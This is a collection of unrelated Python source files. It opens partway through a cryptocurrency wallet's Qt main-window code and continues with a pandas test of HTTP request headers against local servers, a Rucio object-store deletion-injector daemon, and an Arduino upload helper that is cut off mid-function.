# on us after we are closed. They will get deleted when this QObject
# is finally deleted by Qt.
for shortcut in self._shortcuts:
shortcut.setEnabled(False)
del shortcut
self._shortcuts.clear()
# Reparent children to 'None' so python GC can clean them up sooner rather than later.
# This also hopefully helps accelerate this window's GC.
children = [c for c in self.children()
if (isinstance(c, (QWidget, QAction, TaskThread))
and not isinstance(c, (QStatusBar, QMenuBar, QFocusFrame, QShortcut)))]
for c in children:
try: c.disconnect()
except TypeError: pass
c.setParent(None)
def clean_up(self):
if self.cleaned_up:
return
self.cleaned_up = True
if self.wallet.thread: # guard against window close before load_wallet was called (#1554)
self.wallet.thread.stop()
self.wallet.thread.wait() # Join the thread to make sure it's really dead.
if self.wallet.ui_emit_validity_updated:
self.wallet.ui_emit_validity_updated = None # detach callback
self.tx_update_mgr.clean_up() # disconnects some signals
# We catch these errors with the understanding that there is no recovery at
# this point, given user has likely performed an action we cannot recover
# cleanly from. So we attempt to exit as cleanly as possible.
try:
self.config.set_key("is_maximized", self.isMaximized())
self.config.set_key("console-history", self.console.history[-50:], True)
except (OSError, PermissionError) as e:
self.print_error("unable to write to config (directory removed?)", e)
if not self.isMaximized():
try:
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),g.width(),g.height()])
except (OSError, PermissionError) as e:
self.print_error("unable to write to wallet storage (directory removed?)", e)
# Should be no side-effects in this function relating to file access past this point.
if self.qr_window:
self.qr_window.close()
self.qr_window = None # force GC sooner rather than later.
for d in list(self._tx_dialogs):
# clean up all extant tx dialogs we opened as they hold references
# to us that will be invalidated
d.prompt_if_unsaved = False # make sure to unconditionally close
d.close()
for d in list(self._slp_dialogs):
d.close() # make sure dialogs we created are properly closed!
self._close_wallet()
try: self.gui_object.timer.timeout.disconnect(self.timer_actions)
except TypeError: pass # defensive programming: this can happen if we got an exception before the timer action was connected
self.gui_object.close_window(self) # implicitly runs the hook: on_close_window
# Now, actually STOP the wallet's synchronizer and verifiers and remove
# it from the daemon. Note that its addresses will still stay
# 'subscribed' to the ElectrumX server until we connect to a new server,
# (due to ElectrumX protocol limitations).. but this is harmless.
self.gui_object.daemon.stop_wallet(self.wallet.storage.path)
# At this point all plugins should have removed any references to this window.
# Now, just to be paranoid, do some active destruction of signal/slot connections as well as
# Removing child widgets forcefully to speed up Python's own GC of this window.
self.clean_up_connections()
self.clean_up_children()
# And finally, print when we are destroyed by C++ for debug purposes
# We must call this here as above calls disconnected all signals
# involving this widget.
destroyed_print_error(self)
def internal_plugins_dialog(self):
if self.internalpluginsdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.internalpluginsdialog.raise_()
return
d = WindowModalDialog(self.top_level_window(), _('Optional Features'))
weakD = Weak.ref(d)
gui_object = self.gui_object
plugins = gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.get_internal_plugin_count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
weakGrid = Weak.ref(grid)
w.setLayout(grid)
settings_widgets = Weak.ValueDictionary()
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
grid = weakGrid()
d = weakD()
if d and grid and not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
if not p:
# Need to delete settings widget because keeping it around causes bugs as it points to a now-dead plugin instance
settings_widgets.pop(name)
widget.hide(); widget.setParent(None); widget.deleteLater(); widget = None
def do_toggle(weakCb, name, i):
cb = weakCb()
if cb:
p = plugins.toggle_internal_plugin(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# All plugins get this whenever one is toggled.
run_hook('init_qt', gui_object)
for i, descr in enumerate(plugins.internal_plugin_metadata.values()):
name = descr['__name__']
p = plugins.get_internal_plugin(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
weakCb = Weak.ref(cb)
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_internal_plugin_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, weakCb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stderr)
grid.setRowStretch(len(plugins.internal_plugin_metadata.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
self.internalpluginsdialog = d
d.exec_()
self.internalpluginsdialog = None # Python GC please!
def external_plugins_dialog(self):
if self.externalpluginsdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.externalpluginsdialog.raise_()
return
from . import external_plugins_window
d = external_plugins_window.ExternalPluginsDialog(self, _('Plugin Manager'))
self.externalpluginsdialog = d
d.exec_()
self.externalpluginsdialog = None # allow python to GC
def hardware_wallet_support(self):
if not sys.platform.startswith('linux'):
self.print_error("FIXME! hardware_wallet_support is Linux only!")
return
if self.hardwarewalletdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.hardwarewalletdialog.raise_()
return
from .udev_installer import InstallHardwareWalletSupportDialog
d = InstallHardwareWalletSupportDialog(self.top_level_window(), self.gui_object.plugins)
self.hardwarewalletdialog = d
d.exec_()
self.hardwarewalletdialog = None # allow python to GC
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self.top_level_window(), _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel(_('{total_size} bytes').format(total_size=total_size)), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
result = d.exec_()
d.setParent(None) # So Python can GC
if not result:
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
if new_tx is None:
self.show_error(_('CPFP no longer valid'))
return
self.show_transaction(new_tx)
def rebuild_history(self):
if self.gui_object.warn_if_no_network(self):
# Don't allow if offline mode.
return
msg = ' '.join([
_('This feature is intended to allow you to rebuild a wallet if it has become corrupted.'),
"\n\n"+_('Your entire transaction history will be downloaded again from the server and verified from the blockchain.'),
_('Just to be safe, back up your wallet file first!'),
"\n\n"+_("Rebuild this wallet's history now?")
])
if self.question(msg, title=_("Rebuild Wallet History")):
try:
self.wallet.rebuild_history()
except RuntimeError as e:
self.show_error(str(e))
def scan_beyond_gap(self):
if self.gui_object.warn_if_no_network(self):
return
from .scan_beyond_gap import ScanBeyondGap
d = ScanBeyondGap(self)
d.exec_()
d.setParent(None) # help along Python by dropping refct to 0
def copy_to_clipboard(self, text, tooltip=None, widget=None):
tooltip = tooltip or _("Text copied to clipboard")
widget = widget or self
qApp.clipboard().setText(text)
QToolTip.showText(QCursor.pos(), tooltip, widget)
class TxUpdateMgr(QObject, PrintError):
''' Manages new transaction notifications and transaction verified
notifications from the network thread. It collates them and sends them to
the appropriate GUI controls in the main_window in an efficient manner. '''
def __init__(self, main_window_parent):
assert isinstance(main_window_parent, ElectrumWindow), "TxUpdateMgr must be constructed with an ElectrumWindow as its parent"
super().__init__(main_window_parent)
self.cleaned_up = False
self.lock = threading.Lock() # used to lock thread-shared attrs below
# begin thread-shared attributes
self.notif_q = []
self.verif_q = []
self.need_process_v, self.need_process_n = False, False
# /end thread-shared attributes
self.weakParent = Weak.ref(main_window_parent)
main_window_parent.history_updated_signal.connect(self.verifs_get_and_clear, Qt.DirectConnection) # immediately clear verif_q on history update because it would be redundant to keep the verify queue around after a history list update
main_window_parent.on_timer_signal.connect(self.do_check, Qt.DirectConnection) # hook into main_window's timer_actions function
def diagnostic_name(self):
return ((self.weakParent() and self.weakParent().diagnostic_name()) or "???") + "." + __class__.__name__
def clean_up(self):
self.cleaned_up = True
main_window_parent = self.weakParent() # weak -> strong ref
if main_window_parent:
try: main_window_parent.history_updated_signal.disconnect(self.verifs_get_and_clear)
except TypeError: pass
try: main_window_parent.on_timer_signal.disconnect(self.do_check)
except TypeError: pass
def do_check(self):
''' Called from timer_actions in main_window to check if notifs or
verifs need to update the GUI.
- Checks the need_process_[v|n] flags
- If either flag is set, call the @rate_limited process_verifs
and/or process_notifs functions which update GUI parent in a
rate-limited (collated) fashion (for decent GUI responsiveness). '''
with self.lock:
bV, bN = self.need_process_v, self.need_process_n
self.need_process_v, self.need_process_n = False, False
if bV: self.process_verifs() # rate_limited call (1 per second)
if bN: self.process_notifs() # rate_limited call (1 per 15 seconds)
def verifs_get_and_clear(self):
''' Clears the verif_q. This is called from the network
thread for the 'verified2' event as well as from the below
update_verifs (GUI thread), hence the lock. '''
with self.lock:
ret = self.verif_q
self.verif_q = []
self.need_process_v = False
return ret
def notifs_get_and_clear(self):
with self.lock:
ret = self.notif_q
self.notif_q = []
self.need_process_n = False
return ret
def verif_add(self, args):
# args: [wallet, tx_hash, height, conf, timestamp]
# filter out tx's not for this wallet
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
if args[0] is parent.wallet:
with self.lock:
self.verif_q.append(args[1:])
self.need_process_v = True
def notif_add(self, args):
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
tx, wallet = args
# filter out tx's not for this wallet
if wallet is parent.wallet:
with self.lock:
self.notif_q.append(tx)
self.need_process_n = True
@rate_limited(1.0, ts_after=True)
def process_verifs(self):
''' Update history list with tx's from verifs_q, but limit the
GUI update rate to once per second. '''
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
items = self.verifs_get_and_clear()
if items:
t0 = time.time()
parent.history_list.setUpdatesEnabled(False)
parent.slp_history_list.setUpdatesEnabled(False)
had_sorting = [ parent.history_list.isSortingEnabled(),
parent.slp_history_list.isSortingEnabled() ]
if had_sorting[0]:
parent.history_list.setSortingEnabled(False)
if had_sorting[1]:
parent.slp_history_list.setSortingEnabled(False)
n_updates = 0
for item in items:
did_update = parent.history_list.update_item(*item)
parent.slp_history_list.update_item_netupdate(*item)
n_updates += 1 if did_update else 0
self.print_error("Updated {}/{} verified txs in GUI in {:0.2f} ms"
.format(n_updates, len(items), (time.time()-t0)*1e3))
if had_sorting[0]:
parent.history_list.setSortingEnabled(True)
if had_sorting[1]:
parent.slp_history_list.setSortingEnabled(True)
parent.slp_history_list.setUpdatesEnabled(True)
parent.history_list.setUpdatesEnabled(True)
parent.update_status()
@rate_limited(5.0, classlevel=True)
def process_notifs(self):
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
if parent.network:
n_ok = 0
txns = self.notifs_get_and_clear()
if txns and parent.wallet.storage.get('gui_notify_tx', True):
# Combine the transactions
total_amount = 0
tokens_included = set()
for tx in txns:
if tx:
is_relevant, is_mine, v, fee = parent.wallet.get_wallet_delta(tx)
if is_relevant:
total_amount += v
n_ok += 1
if parent.is_slp_wallet:
try:
tti = parent.wallet.get_slp_token_info(tx.txid())
tokens_included.add(parent.wallet.token_types.get(tti['token_id'],{}).get('name','unknown'))
except KeyError:
pass
if tokens_included:
tokstring = _('. Tokens included: ') + ', '.join(sorted(tokens_included))
else:
tokstring = ''
if total_amount > 0:
self.print_error("Notifying GUI %d tx"%(n_ok))
if n_ok > 1:
parent.notify(_("{} new transactions: {}{}")
.format(n_ok, parent.format_amount_and_units(total_amount, is_diff=True), tokstring))
else:
parent.notify(_("New transaction: {}{}").format(parent.format_amount_and_units(total_amount, is_diff=True), tokstring))
|
test_user_agent.py
|
"""
Tests for the pandas custom headers in http(s) requests
"""
import gzip
import http.server
from io import BytesIO
import threading
import pytest
import pandas.util._test_decorators as td
import pandas as pd
import pandas._testing as tm
class BaseUserAgentResponder(http.server.BaseHTTPRequestHandler):
"""
Base class for setting up a server that can be set up to respond
with a particular file format with accompanying content-type headers.
The interfaces on the different io methods are different enough
that this seemed logical to do.
"""
def start_processing_headers(self):
"""
shared logic at the start of a GET request
"""
self.send_response(200)
self.requested_from_user_agent = self.headers["User-Agent"]
response_df = pd.DataFrame(
{
"header": [self.requested_from_user_agent],
}
)
return response_df
def gzip_bytes(self, response_bytes):
"""
some web servers will send back gzipped files to save bandwidth
"""
bio = BytesIO()
zipper = gzip.GzipFile(fileobj=bio, mode="w")
zipper.write(response_bytes)
zipper.close()
response_bytes = bio.getvalue()
return response_bytes
def write_back_bytes(self, response_bytes):
"""
shared logic at the end of a GET request
"""
self.wfile.write(response_bytes)
class CSVUserAgentResponder(BaseUserAgentResponder):
def do_GET(self):
response_df = self.start_processing_headers()
self.send_header("Content-Type", "text/csv")
self.end_headers()
response_bytes = response_df.to_csv(index=False).encode("utf-8")
self.write_back_bytes(response_bytes)
class GzippedCSVUserAgentResponder(BaseUserAgentResponder):
def do_GET(self):
response_df = self.start_processing_headers()
self.send_header("Content-Type", "text/csv")
self.send_header("Content-Encoding", "gzip")
self.end_headers()
response_bytes = response_df.to_csv(index=False).encode("utf-8")
response_bytes = self.gzip_bytes(response_bytes)
self.write_back_bytes(response_bytes)
class JSONUserAgentResponder(BaseUserAgentResponder):
def do_GET(self):
response_df = self.start_processing_headers()
self.send_header("Content-Type", "application/json")
self.end_headers()
response_bytes = response_df.to_json().encode("utf-8")
self.write_back_bytes(response_bytes)
class GzippedJSONUserAgentResponder(BaseUserAgentResponder):
def do_GET(self):
response_df = self.start_processing_headers()
self.send_header("Content-Type", "application/json")
self.send_header("Content-Encoding", "gzip")
self.end_headers()
response_bytes = response_df.to_json().encode("utf-8")
response_bytes = self.gzip_bytes(response_bytes)
self.write_back_bytes(response_bytes)
class ParquetPyArrowUserAgentResponder(BaseUserAgentResponder):
def do_GET(self):
response_df = self.start_processing_headers()
self.send_header("Content-Type", "application/octet-stream")
self.end_headers()
response_bytes = response_df.to_parquet(index=False, engine="pyarrow")
self.write_back_bytes(response_bytes)
class ParquetFastParquetUserAgentResponder(BaseUserAgentResponder):
def do_GET(self):
response_df = self.start_processing_headers()
self.send_header("Content-Type", "application/octet-stream")
self.end_headers()
# the fastparquet engine doesn't like to write to a buffer
# it can do it via the open_with function being set appropriately
# however it automatically calls the close method and wipes the buffer
# so just overwrite that attribute on this instance to not do that
# protected by an importorskip in the respective test
import fsspec
response_df.to_parquet(
"memory://fastparquet_user_agent.parquet",
index=False,
engine="fastparquet",
compression=None,
)
with fsspec.open("memory://fastparquet_user_agent.parquet", "rb") as f:
response_bytes = f.read()
self.write_back_bytes(response_bytes)
class PickleUserAgentResponder(BaseUserAgentResponder):
def do_GET(self):
response_df = self.start_processing_headers()
self.send_header("Content-Type", "application/octet-stream")
self.end_headers()
bio = BytesIO()
response_df.to_pickle(bio)
response_bytes = bio.getvalue()
self.write_back_bytes(response_bytes)
class StataUserAgentResponder(BaseUserAgentResponder):
def do_GET(self):
response_df = self.start_processing_headers()
self.send_header("Content-Type", "application/octet-stream")
self.end_headers()
bio = BytesIO()
response_df.to_stata(bio, write_index=False)
response_bytes = bio.getvalue()
self.write_back_bytes(response_bytes)
class AllHeaderCSVResponder(http.server.BaseHTTPRequestHandler):
"""
Send all request headers back for checking round trip
"""
def do_GET(self):
response_df = pd.DataFrame(self.headers.items())
self.send_response(200)
self.send_header("Content-Type", "text/csv")
self.end_headers()
response_bytes = response_df.to_csv(index=False).encode("utf-8")
self.wfile.write(response_bytes)
@pytest.mark.parametrize(
"responder, read_method, port, parquet_engine",
[
(CSVUserAgentResponder, pd.read_csv, 34259, None),
pytest.param(
JSONUserAgentResponder,
pd.read_json,
34260,
None,
marks=td.skip_array_manager_not_yet_implemented,
),
(ParquetPyArrowUserAgentResponder, pd.read_parquet, 34261, "pyarrow"),
(ParquetFastParquetUserAgentResponder, pd.read_parquet, 34262, "fastparquet"),
(PickleUserAgentResponder, pd.read_pickle, 34263, None),
(StataUserAgentResponder, pd.read_stata, 34264, None),
(GzippedCSVUserAgentResponder, pd.read_csv, 34265, None),
pytest.param(
GzippedJSONUserAgentResponder,
pd.read_json,
34266,
None,
marks=td.skip_array_manager_not_yet_implemented,
),
],
)
def test_server_and_default_headers(responder, read_method, port, parquet_engine):
if parquet_engine is not None:
pytest.importorskip(parquet_engine)
if parquet_engine == "fastparquet":
pytest.importorskip("fsspec")
server = http.server.HTTPServer(("localhost", port), responder)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
if parquet_engine is None:
df_http = read_method(f"http://localhost:{port}")
else:
df_http = read_method(f"http://localhost:{port}", engine=parquet_engine)
server.shutdown()
server.server_close()
server_thread.join()
assert not df_http.empty
@pytest.mark.parametrize(
"responder, read_method, port, parquet_engine",
[
(CSVUserAgentResponder, pd.read_csv, 34267, None),
pytest.param(
JSONUserAgentResponder,
pd.read_json,
34268,
None,
marks=td.skip_array_manager_not_yet_implemented,
),
(ParquetPyArrowUserAgentResponder, pd.read_parquet, 34269, "pyarrow"),
(ParquetFastParquetUserAgentResponder, pd.read_parquet, 34270, "fastparquet"),
(PickleUserAgentResponder, pd.read_pickle, 34271, None),
(StataUserAgentResponder, pd.read_stata, 34272, None),
(GzippedCSVUserAgentResponder, pd.read_csv, 34273, None),
pytest.param(
GzippedJSONUserAgentResponder,
pd.read_json,
34274,
None,
marks=td.skip_array_manager_not_yet_implemented,
),
],
)
def test_server_and_custom_headers(responder, read_method, port, parquet_engine):
if parquet_engine is not None:
pytest.importorskip(parquet_engine)
if parquet_engine == "fastparquet":
pytest.importorskip("fsspec")
custom_user_agent = "Super Cool One"
df_true = pd.DataFrame({"header": [custom_user_agent]})
server = http.server.HTTPServer(("localhost", port), responder)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
if parquet_engine is None:
df_http = read_method(
f"http://localhost:{port}",
storage_options={"User-Agent": custom_user_agent},
)
else:
df_http = read_method(
f"http://localhost:{port}",
storage_options={"User-Agent": custom_user_agent},
engine=parquet_engine,
)
server.shutdown()
server.server_close()
server_thread.join()
tm.assert_frame_equal(df_true, df_http)
@pytest.mark.parametrize(
"responder, read_method, port",
[
(AllHeaderCSVResponder, pd.read_csv, 34275),
],
)
def test_server_and_all_custom_headers(responder, read_method, port):
custom_user_agent = "Super Cool One"
custom_auth_token = "Super Secret One"
storage_options = {
"User-Agent": custom_user_agent,
"Auth": custom_auth_token,
}
server = http.server.HTTPServer(("localhost", port), responder)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
df_http = read_method(
f"http://localhost:{port}",
storage_options=storage_options,
)
server.shutdown()
server.server_close()
server_thread.join()
df_http = df_http[df_http["0"].isin(storage_options.keys())]
df_http = df_http.sort_values(["0"]).reset_index()
df_http = df_http[["0", "1"]]
keys = list(storage_options.keys())
df_true = pd.DataFrame({"0": keys, "1": [storage_options[k] for k in keys]})
df_true = df_true.sort_values(["0"])
df_true = df_true.reset_index().drop(["index"], axis=1)
tm.assert_frame_equal(df_true, df_http)
@pytest.mark.parametrize(
"engine",
[
"pyarrow",
"fastparquet",
],
)
def test_to_parquet_to_disk_with_storage_options(engine):
headers = {
"User-Agent": "custom",
"Auth": "other_custom",
}
pytest.importorskip(engine)
true_df = pd.DataFrame({"column_name": ["column_value"]})
msg = (
"storage_options passed with file object or non-fsspec file path|"
"storage_options passed with buffer, or non-supported URL"
)
with pytest.raises(ValueError, match=msg):
true_df.to_parquet("/tmp/junk.parquet", storage_options=headers, engine=engine)
|
os_injector.py
|
# Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Wen Guan, <wen.guan@cern.ch>, 2017
"""
OS injector is a daemon to inject OS files for deletion
"""
import datetime
import dateutil.parser
import hashlib
import logging
import os
import pytz
import random
import socket
import sys
import threading
import time
import traceback
from rucio.common.config import config_get
from rucio.core import rse as rse_core
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.temporary_did import (add_temporary_dids, get_count_of_expired_temporary_dids)
from rucio.rse import rsemanager as rsemgr
from rucio.daemons.reaper.reaper import __check_rse_usage
logging.getLogger("requests").setLevel(logging.CRITICAL)
logging.basicConfig(stream=sys.stdout,
level=getattr(logging, config_get('common', 'loglevel').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
GRACEFUL_STOP = threading.Event()
def inject(rse, older_than):
logging.info('Starting to inject objects for RSE: %s' % rse)
num_of_queued_dids = get_count_of_expired_temporary_dids(rse)
rse_id = rse_core.get_rse_id(rse)
if num_of_queued_dids < 1000:
max_being_deleted_files, needed_free_space, used, free = __check_rse_usage(rse=rse, rse_id=rse_id)
logging.info("needed_free_space: %s" % needed_free_space)
if needed_free_space is None or needed_free_space > 0:
rse_info = rsemgr.get_rse_info(rse)
for protocol in rse_info['protocols']:
protocol['impl'] = 'rucio.rse.protocols.s3boto.Default'
prot = rsemgr.create_protocol(rse_info, 'delete')
try:
prot.connect()
dids = []
older_than_time = datetime.datetime.utcnow() - datetime.timedelta(days=older_than)
older_than_time = older_than_time.replace(tzinfo=pytz.utc)
for key in prot.list():
d = dateutil.parser.parse(key.last_modified)
if d < older_than_time:
did = {'scope': 'transient',
'name': key.name.encode('utf-8'),
'rse': rse,
'rse_id': rse_id,
'bytes': key.size,
'created_at': d}
dids.append(did)
if len(dids) == 1000:
add_temporary_dids(dids=dids, account='root')
logging.info('Adding 1000 dids to temp dids.')
dids = []
else:
pass
logging.info('Found objects newer than %s days, quit to list(normally objects in os are returned with order by time)' % older_than)
break
if GRACEFUL_STOP.is_set():
logging.info('GRACEFUL_STOP is set. quit')
break
except:
logging.critical(traceback.format_exc())
else:
logging.info("Number of queued deletion for %s is %s, which is bigger than 1000. quit." % (rse, num_of_queued_dids))
def injector(rses=[], once=False, scheme=None, worker_number=0, total_workers=1, older_than=30, sleep_time=1):
"""
Main loop to select and delete files.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param once: If True, only runs one iteration of the main loop.
:param scheme: Force the reaper to use a particular protocol, e.g., mock.
:param older_than: List control: older objects more than this value of days to list.
:param sleep_time: Days to sleep.
"""
logging.info('Starting Light Injector %s-%s: Will work on RSEs: %s', worker_number, total_workers, str(rses))
pid = os.getpid()
thread = threading.current_thread()
hostname = socket.gethostname()
executable = ' '.join(sys.argv)
hash_executable = hashlib.sha256(sys.argv[0] + ''.join(rses)).hexdigest()
sanity_check(executable=None, hostname=hostname)
injecting_time = time.time()
while not GRACEFUL_STOP.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Light Injector({0[worker_number]}/{0[total_workers]}): Live gives {0[heartbeat]}'.format(locals()))
nothing_to_do = True
random.shuffle(rses)
for rse in rses:
inject(rse, older_than)
if once:
break
next_inject_time = injecting_time + 3600 * 24 * sleep_time
logging.info('Will sleep %s seconds(about %s days)' % (next_inject_time - time.time(), (next_inject_time - time.time()) * 1.0 / 86400))
while not GRACEFUL_STOP.is_set() and time.time() < next_inject_time:
time.sleep(1)
except:
logging.critical(traceback.format_exc())
die(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Graceful stop requested')
logging.info('Graceful stop done')
return
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
def run(one_worker_per_rse=False, once=False, rses=[], scheme=None, all_os_rses=False, older_than=30, sleep_time=1):
"""
Starts up the injector threads.
:param one_worker_per_rse: If True, one worker per RSE; Otherwise, one worker for all RSEs.
:param once: If True, only runs one iteration of the main loop.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param scheme: Force the reaper to use a particular protocol/scheme, e.g., mock.
:param all_os_rses: All Objectstore RSEs.
:param older_than: List control: older objects more than this value of days to list.
:param sleep_time: Days to sleep.
"""
logging.info('main: starting processes')
if all_os_rses:
rses = []
for rse in rse_core.list_rses():
if rse['rse'].endswith('_ES'):
rses.append(rse['rse'])
threads = []
if one_worker_per_rse:
worker = 0
for rse in rses:
kwargs = {'once': once, 'rses': [rse], 'scheme': scheme, 'worker_number': worker, 'total_workers': len(rses),
'older_than': older_than, 'sleep_time': sleep_time}
threads.append(threading.Thread(target=injector, kwargs=kwargs, name='Worker: %s, Total_Workers: %s' % (worker, len(rses))))
worker += 1
else:
kwargs = {'once': once, 'rses': rses, 'scheme': scheme, 'older_than': older_than, 'sleep_time': sleep_time}
threads.append(threading.Thread(target=injector, kwargs=kwargs, name='Worker: %s, Total_Workers: %s' % (0, 1)))
[t.start() for t in threads]
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
uploader.py
|
#-*- coding: utf-8 -*-
# stino/uploader.py
import threading
import time
from . import constant
from . import compiler
from . import console
from . import serial
from . import pyserial
class Uploader:
def __init__(self, args, cur_compiler, mode = 'upload'):
self.args = args.getArgs()
self.mode = mode
self.compiler = cur_compiler
self.command_list = []
self.output_console = cur_compiler.getOutputConsole()
self.no_error = True
upload_command_text = ''
if mode == 'upload':
if 'upload.pattern' in self.args:
upload_command_text = self.args['upload.pattern']
elif mode == 'programmer':
if 'program.pattern' in self.args:
upload_command_text = self.args['program.pattern']
if upload_command_text:
upload_command = compiler.Command(upload_command_text)
upload_command.setOutputText('Uploading...\n')
self.command_list.append(upload_command)
if 'reboot.pattern' in self.args:
reboot_command_text = self.args['reboot.pattern']
reboot_command = compiler.Command(reboot_command_text)
self.command_list.append(reboot_command)
def run(self):
if self.command_list:
upload_thread = threading.Thread(target=self.upload)
upload_thread.start()
else:
self.no_error = False
def upload(self):
while not self.compiler.isFinished():
time.sleep(0.5)
if not self.compiler.noError():
return
serial_port = serial.getSelectedSerialPort()
serial_monitor = None
if serial_port in constant.serial_in_use_list:
serial_monitor = constant.serial_monitor_dict[serial_port]
serial_monitor.stop()
force_to_reset = False
if self.mode == 'upload':
if 'bootloader.file' in self.args:
if 'caterina' in self.args['bootloader.file'].lower():
force_to_reset = True
elif self.args.get('upload.use_1200bps_touch', 'false') == 'true':
force_to_reset = True
if force_to_reset:
pre_serial_port = serial_port
wait_for_upload_port = self.args.get('upload.wait_for_upload_port', 'false') == 'true'
serial_port = resetSerial(pre_serial_port, self.output_console, wait_for_upload_port)
if self.args['cmd'] != 'avrdude':
if serial_port.startswith('/dev/'):
serial_port = serial_port[5:]
if serial_port:
for cur_command in self.command_list:
command_text = cur_command.getCommand()
command_text = command_text.replace(pre_serial_port, serial_port)
cur_command.setCommand(command_text)
for cur_command in self.command_list:
return_code = cur_command.run(self.output_console)
if return_code > 0:
self.output_console.printText('[Stino - Error %d]\n' % return_code)
self.no_error = False
break
if self.no_error:
self.output_console.printText('[Stino - Done uploading.]\n')
if force_to_reset:
time.sleep(5)
if serial_monitor:
serial_monitor.start()
def touchSerialPort(serial_port, baudrate):
cur_serial = pyserial.Serial()
cur_serial.port = serial_port
cur_serial.baudrate = baudrate
cur_serial.bytesize = pyserial.EIGHTBITS
cur_serial.stopbits = pyserial.STOPBITS_ONE
cur_serial.parity = pyserial.PARITY_NONE
cur_serial.open()
cur_serial.close()
def resetSerial(serial_port, output_console, wait_for_upload_port):
show_upload_output = constant.sketch_settings.get('show_upload_output', False)
caterina_serial_port = ''
before_serial_list = serial.getSerialPortList()
if serial_port in before_serial_list:
non_serial_list = before_serial_list[:]
non_serial_list.remove(serial_port)
if show_upload_output:
msg = 'Forcing reset using 1200bps open/close on port %s.\n' % serial_port
output_console.printText(msg)
touchSerialPort(serial_port, 1200)
if not wait_for_upload_port:
time.sleep(0.4)
return serial_port
# Scanning for available ports seems to open the port or
# otherwise assert DTR, which would cancel the WDT reset if
# it happened within 250 ms. So we wait until the reset should
# have already occured before we start scanning.
if constant.sys_platform == 'windows':
time.sleep(3)
else:
time.sleep(0.3)
# Wait for a port to appear on the list
elapsed = 0
while (elapsed < 10000):
now_serial_list = serial.getSerialPortList()
diff_serial_list = diffList(now_serial_list, non_serial_list)
if show_upload_output:
